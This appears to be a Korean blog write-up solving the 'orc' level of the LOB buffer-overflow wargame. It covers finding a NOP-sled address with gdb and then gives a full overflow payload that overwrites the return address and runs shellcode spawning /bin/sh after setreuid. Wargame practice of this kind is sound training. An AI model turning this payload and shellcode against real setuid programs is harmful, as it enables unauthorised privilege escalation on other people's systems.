728x90
반응형
cp명령어 같은 건 무시하고 다시 접속을 하여 문제를 풀면
orc.c를 열어보면 buffer가 40이고 리턴값이 \xbf가 꼭 들어가야 한다고 나온다.
gdb를 명령어를 이용하여 메인에 브레이크포인트를 걸고 r $(python -c 'print "\x90"*100을 입력하여 esp값을 바꾸었다.
그후 x/100 $esp로 값을 확인하면 90909090들어가 있는 주소를 볼수 있다.
payload를 작성해보면 ./orc $(python -c 'print "\x90"*40+"AAAA(dummy)"+"\xdb\xfb\xff\xbf(ret 주소값)"+"\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"')
728x90
반응형
'Wargame > CTF(Capture The Flag)' 카테고리의 다른 글
LOB darklf (0) | 2015.09.15 |
---|---|
LOB wolfman (0) | 2015.09.15 |
LOB goblin (0) | 2015.09.15 |
LOB gremlin (0) | 2015.09.14 |
LOB gate (0) | 2015.09.14 |
댓글0